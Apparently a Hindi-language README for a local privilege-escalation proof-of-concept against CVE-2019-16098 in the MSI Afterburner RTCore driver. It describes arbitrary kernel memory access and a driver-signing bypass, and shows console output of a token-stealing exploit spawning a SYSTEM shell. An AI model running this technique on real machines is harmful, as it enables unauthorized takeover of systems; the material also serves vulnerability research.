
CVE-2019-16098 के लिए स्थानीय विशेषाधिकार वृद्धि PoC एक्सप्लॉइट
Micro-Star MSI Afterburner 4.6.2.15658 (उर्फ RTCore64.sys और RTCore32.sys) में ड्राइवर किसी भी प्रमाणित उपयोगकर्ता को मनमानी मेमोरी, I/O पोर्ट्स और MSRs को पढ़ने और लिखने की अनुमति देता है। इसका उपयोग विशेषाधिकार वृद्धि, उच्च विशेषाधिकारों के तहत कोड निष्पादन और सूचना प्रकटीकरण के लिए किया जा सकता है। इन हस्ताक्षरित ड्राइवरों का उपयोग Microsoft ड्राइवर-हस्ताक्षर नीति को बायपास करके दुर्भावनापूर्ण कोड तैनात करने के लिए भी किया जा सकता है।
अधिक अपडेट के लिए, यहाँ जाएँ CVE-2019-16098
चेतावनी: Hardcoded Windows 10 x64 Version 1903 offsets!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat
C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM
C:\Users\Barakat\source\repos\CVE-2019-16098>